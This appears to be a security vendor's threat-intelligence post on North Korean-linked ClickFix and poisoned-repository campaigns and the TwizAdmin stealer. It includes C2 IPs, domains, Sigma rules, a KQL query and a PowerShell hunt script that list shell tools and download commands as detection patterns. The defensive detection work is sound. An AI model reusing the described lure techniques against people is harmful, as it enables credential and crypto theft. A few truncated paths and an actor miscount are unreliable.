Back to Intelligence

Lazarus & Void Dokkaebi Campaigns: Mach-O Man, TwizAdmin, and Dev Repo Poisoning — OTX Pulse Analysis

SA
Security Arsenal Team
April 23, 2026
6 min read

Live OTX data indicates a surge in sophisticated operations targeting the financial and technology sectors. Three distinct threat actors—Lazarus Group (operating as Void Dokkaebi) and DataBreachPlus—are leveraging social engineering and supply chain attacks to deploy multi-platform malware.

  • Void Dokkaebi (WageMole): Actively targeting software developers via fake job interviews and poisoned Git repositories. The campaign uses malicious VS Code tasks to propagate the DEV#POPPER RAT and BeaverTail loader.
  • Lazarus Group (Mach-O Man): Deploying a new macOS malware kit via "ClickFix" attacks. Victims are lured via fake meeting invitations on Telegram, tricking them into running terminal commands that install PyLangGhostRAT.
  • DataBreachPlus (TwizAdmin): A Russian-speaking operation pushing a multi-stage malware suite (TwizAdmin/crpx0) that combines cryptocurrency clipping (8 chains), seed phrase theft, and ransomware capabilities. The operation utilizes an exposed FastAPI C2 panel.

Collectively, these campaigns demonstrate a shift towards platform-agnostic threats (Windows/macOS) focusing on credential harvesting and financial theft.

Threat Actor / Malware Profile

1. TwizAdmin (DataBreachPlus)

  • Malware Families: TwizAdmin, crpx0 (Ransomware), Java RAT.
  • Distribution: Masquerades as legitimate delivery (FedEx) or utility downloads.
  • Behavior: A modular payload that initially functions as a crypto-clipper, replacing wallet addresses in the clipboard. It escalates to BIP-39 seed phrase theft and browser credential dumping. A secondary ransomware module (crpx0) can be deployed if monetization fails.
  • C2: FastAPI-based panel hosted on port 1337; requires license keys, suggesting a MaaS (Malware-as-a-Service) model.

2. Mach-O Man / PyLangGhostRAT (Lazarus Group)

  • Malware Families: Mach-O Man, PyLangGhostRAT.
  • Distribution: "ClickFix" social engineering. Targets receive fake Zoom/Teams calendar invites via Telegram, leading to fraudulent sites that prompt users to run curl or bash commands to "fix" connection issues.
  • Behavior: Native macOS payloads (Mach-O binaries) that steal browser cookies, passwords, and Telegram session data. Exfiltration is performed via the Telegram API.

3. Void Dokkaebi (Famous Chollima)

  • Malware Families: DEV#POPPER RAT, InvisibleFerret, OtterCookie, BeaverTail.
  • Distribution: Supply chain attack via cloned malicious repositories. Initial contact is made through fake recruiter interviews on LinkedIn/Telegram.
  • Behavior: Poisoned .vscode/tasks. files execute malicious commands upon opening the project in VS Code. The malware worm-propagates by tampering with local Git history, pushing malicious changes to victim-owned repositories.

IOC Analysis

The provided IOCs include:

  • Network Infrastructure: C2 IPs including 103.241.66[.]238 (TwizAdmin), 166.88.4.2, and multiple 23.27.x.x ranges associated with Void Dokkaebi.
  • Typosquatting: livemicrosft.com used in the Mach-O Man campaign to impersonate Microsoft collaboration tools.
  • File Hashes (SHA256): Over 20 unique hashes corresponding to Mach-O binaries, Windows loaders, and Python-based stealers.

Operational Guidance: SOC teams should prioritize blocking the listed domains and IP ranges at the firewall and proxy level. The file hashes should be added to EDR blocklists immediately. The presence of livemicrosft.com or connections to port 1337 on non-standard corporate IPs should trigger high-severity alerts.

Detection Engineering

Sigma Rules

YAML
---
title: Potential ClickFix Activity - Browser Spawning Terminal
id: 6e1a3c8d-9a2b-4c0d-8e1f-1b2c3d4e5f6a
description: Detects suspicious activity where a browser or communication application spawns a terminal or shell process, often indicative of ClickFix attacks leading to malware execution like Mach-O Man.
status: experimental
date: 2026/04/23
author: Security Arsenal
logsource:
  category: process_creation
  product: macos
detection:
  selection:
    ParentImage|endswith:
      - '/Google Chrome'
      - '/Firefox'
      - '/Telegram'
      - '/Microsoft Teams'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/zsh'
      - '/curl'
      - '/osascript'
  condition: selection
falsepositives:
  - Legitimate developer workflows launching scripts from browser downloads
level: high
---
title: VS Code Task Execution Suspicious Command
id: 7b2c4d9e-0b3c-5d1e-9f2a-2c3d4e5f6a7b
description: Detects execution of potentially malicious commands via VS Code tasks, a technique used by Void Dokkaebi to propagate BeaverTail and DEV#POPPER RAT.
status: experimental
date: 2026/04/23
author: Security Arsenal
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|contains: 'Microsoft VS Code'
    Image|endswith:
      - 'powershell.exe'
      - 'cmd.exe'
      - 'wscript.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'DownloadString'
      - 'git config'
  condition: selection
falsepositives:
  - Legitimate build scripts or extensions
level: medium
---
title: TwizAdmin C2 Connection FastAPI Port
id: 8c3d5e0f-1c4d-6e2f-0a3b-3d4e5f6a7b8c
description: Detects outbound connections to port 1337, associated with the TwizAdmin malware C2 panel.
status: experimental
date: 2026/04/23
author: Security Arsenal
logsource:
  category: network_connection
  product: windows
detection:
  selection:
    DestinationPort: 1337
    Initiated: 'true'
  filter:
    DestinationIp|contains:
      - '127.0.0.1'
      - '10.'
      - '192.168.'
      - '172.16.'
  condition: selection and not filter
falsepositives:
  - Legitimate local development on port 1337
level: high

KQL (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for Void Dokkaebi and TwizAdmin IOCs
let IOCs = dynamic([
    "103.241.66.238", "31.31.198.206", "166.88.4.2", "85.239.62.36", 
    "23.27.20.143", "23.27.202.27", "23.27.120.142", "154.91.0.196",
    "livemicrosft.com", "fanonlyatn.xyz"
]);
DeviceNetworkEvents
| where RemoteIP in IOCs or RemoteUrl in IOCs
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteIP, RemoteUrl, RemotePort
| order by Timestamp desc

PowerShell Hunt Script

PowerShell
<#
    TwizAdmin & Void Dokkaebi IOC Hunt
    Checks for process connections to known C2 IPs and suspicious file hashes in temp paths.
#>

$MaliciousIPs = @(
    "103.241.66.238", "31.31.198.206", "166.88.4.2", "85.239.62.36", 
    "23.27.20.143", "23.27.202.27", "23.27.120.142", "154.91.0.196",
    "198.105.127.210", "83.168.68.219"
)

Write-Host "Checking for active network connections to C2 infrastructure..." -ForegroundColor Cyan

# Get established TCP connections
$netStat = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue

foreach ($ip in $MaliciousIPs) {
    $hits = $netStat | Where-Object { $_.RemoteAddress -eq $ip }
    if ($hits) {
        Write-Host "[!] ALERT: Connection found to malicious IP: $ip" -ForegroundColor Red
        $hits | ForEach-Object { 
            $proc = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
            Write-Host "    PID: $($_.OwningProcess) | Process: $($proc.ProcessName) | Path: $($proc.Path)"
        }
    }
}

Write-Host "Checking for suspicious VS Code task execution..." -ForegroundColor Cyan
$vscodeLog = "$env:APPDATA\Code\logs\*
*.log"
if (Test-Path $vscodeLog) {
    Select-String -Path $vscodeLog -Pattern "curl|Invoke-WebRequest|DownloadString" -Context 2,2 | Select-Object -Last 20
}


# Response Priorities

*   **Immediate**:
    *   Block all IOCs (Domains `fanonlyatn.xyz`, `livemicrosft.com`; IPs `103.241.66.238`, `166.88.4.2`, etc.) at perimeter firewalls and proxies.
    *   Isolate any endpoints with detected connections to port 1337 or the listed Void Dokkaebi IP ranges.
    *   Scan for the listed SHA256 hashes; quarantine any matches.

*   **24 Hours**:
    *   Initiate credential resets for developers and finance staff who may have been exposed to credential stealers (TwizAdmin/Mach-O Man).
    *   Audit Git repositories for unauthorized changes to `.vscode/tasks.` and recent pushes from unknown developers.

*   **1 Week**:
    *   Implement strict application allowlisting for terminal/bash execution on macOS devices to mitigate ClickFix.
    *   Enforce "Review and Approval" workflows for all external VS Code extensions and cloned Git repositories.
    *   Conduct security awareness training focused on identifying fake job interview lures and fake meeting invitations.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-aptlazarus-grouptwizadminsupply-chainclickfixmacos-malware

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action